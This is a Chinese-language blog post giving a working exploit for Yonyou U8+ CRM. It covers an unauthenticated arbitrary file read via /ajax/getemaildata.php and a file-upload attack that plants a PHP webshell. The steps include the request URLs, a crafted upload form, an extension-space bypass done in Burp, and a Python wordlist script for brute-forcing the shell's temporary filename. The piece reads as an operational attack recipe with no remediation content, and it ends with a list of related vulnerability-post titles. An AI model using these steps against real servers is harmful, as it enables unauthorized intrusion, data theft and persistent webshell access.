用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞

任意文件读取

存在漏洞的文件为:

/ajax/getemaildata.php

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt

可以看到用友版本7.2 patch2

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

可以看到C://windows/win.ini

任意文件上传

首先构造一个文件上传的页面

<html><form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data"> <input type="file" name="file" /> <input type="submit" name="upload" value="upload"/></form></html>

选择php一句话木马

打开burp进行抓包,在文件上传的后缀名处添加一个空格

返回的tmpfile\\mht3AC8.tmp.mht即为木马地址,访问http://IP:端口/tmpfile//mht3AC8.tmp.mht即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php,将前面的mht改为upd,将后面的mht改为php

抓包,将其放到爆破工具里,爆破中间的3AC8,范围是从0000~FFFF,共65536个

生成字典的脚本如下:

with open('1.txt', 'w') as f:for i in range(0x10000):f.write(format(i, '04X') + '\n')

该脚本会在当前目录下生成1.txt

成功访问到马

用友U8+ CRM任意文件上传、任意文件读取 实战相关推荐

  1. 通达OA未授权任意文件上传及文件包含漏洞分析学习

    今年3月份通达OA爆出了文件上传和文件包含漏洞,网络上很多复现和分析的博客,今天我也来试着分析分析,据360灵腾安全实验室判断该漏洞等级为高,利用难度低,威胁程度高,所以可能比较适合代码审计的新手来练 ...

  2. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  3. 代码审计:YCCMS 代码执行 文件上传 任意文件删除

    代码审计:YCCMS 代码执行 文件上传 任意文件删除 YCCMS 审计准备 代码审计 代码执行漏洞 文件上传漏洞 任意文件删除漏洞 YCCMS YCCMS是一款PHP版轻量级CMS建站系统,程序页面 ...

  4. 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞

    漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...

  5. SRC挖洞之文件上传/下载漏洞的实战案例

    文章目录 前言 任意文件下载 案例1 某OA系统任意文件下载 案例2 某登录页面任意文件下载 案例3 某金融网站任意文件下载 案例4 服务端过滤 ../ 绕过下载 案例5 %00截断后下载任意文件 文 ...

  6. java文件上传_Java文件上传细讲

    什么是文件上传? 文件上传就是把用户的信息保存起来. 为什么需要文件上传? 在用户注册的时候,可能需要用户提交照片.那么这张照片就应该要进行保存. 上传组件(工具) 为什么我们要使用上传工具? 为啥我 ...

  7. httpclient base64 文件上传_文件上传下载

    说道文件上传下载,这个业务需求并不是很复杂思想如下 1.将文件上传到 某台服务器上的指定的路径下也可以这样理解 文件上传就是将本地图片发送到别的地方,下载就是将别的地方的图片放在本地 2.将路径同文件 ...

  8. 踩坑 - click事件与blur事件冲突问题 input文件上传同名文件问题

    前言 上周写需求遇到了一点小坑涉及到一些小细节,今天赶上没啥事总结一下分享出来. click事件与blur事件冲突问题 click事件与blur事件 blur事件: 表单事件,元素失去焦点时候触发,不 ...

  9. 文件上传、文件包含和目路遍历杂谈

    一.说明 文件上传.文件包含和目路遍历是<黑客防线>盛行的时代常谈的getshell手法,但到现在的安全书藉感觉就比较少提及或一笔带过.在谈的年代看不懂,在看得懂的年代又不谈了,概念感觉总 ...

  10. 文件上传时,文件太大会有几种被限制的情况

    文件上传时,文件太大会有几种被限制的情况 ​ 近期在维护一个项目时,商户有反馈,在新增用户时会直接卡住并报错,返回一个异常,应用层没有日志,最后排查出来是nginx限制了请求的最大值. ​ 那么整个链 ...

最新文章

  1. pandas计算dataframe两列数据值相等的行号、取出DataFrame中两列值相等的行号
  2. linux排序语言,Go语言排序sort的使用
  3. matlab怎让3d旋转,如何在MATLAB中平滑旋转3D绘图?
  4. 利用JS代码屏蔽指定地区访客浏览网站
  5. Hibernate 常见异常
  6. 存储过程可重用的代码块_利用软件重用经验进行自动化测试推荐
  7. python调用c++动态库_Python应用:调用C/C++动态链接库的方法详解
  8. openwrt nas_NAS里整个软路由
  9. spring源码之bean加载(bean解析下篇)
  10. mysql数据库白羽_Android应用开发Android 友盟推送原理解析
  11. python用smtplib、emai模块群发邮件
  12. 新浪微博开发平台地址 http://open.weibo.com/
  13. DAH首度披露“超级账本”区块链平台…
  14. python计算天数包含几周_如何在python中计算几周内两个日期之间的差异
  15. 管理菜单 结贴回复 来自 202.112.36.253 的回复: TTL 传输中过期
  16. 人工神经网络:径向基函数神经网络
  17. 版号解禁,网络游戏却未解冻
  18. 前端面试题之【CSS】
  19. windows10下Docker部署Kurento
  20. 深度学习中,范数有什么意义

热门文章

  1. jquery mobile android浏览器,我们怎样使用jQuery Mobile实现手机新闻浏览器
  2. 3.进制——进制转换和计算机存储单位
  3. 更改Windows Powser Shell 默认字体Consolas (一)
  4. 苹果禁用UDID再续:OpenUDID有望成为替代方案
  5. [转贴] 游戏服务器架构
  6. html5游戏狗,保卫萝卜2地下庄园D5攻略 极限清理太阳
  7. Hardcoded string should use @string resource
  8. python保存数据到文件的几种方法
  9. 苹果应用商店上架流程
  10. EBS 个性化示例1:修改标准FORM的LOV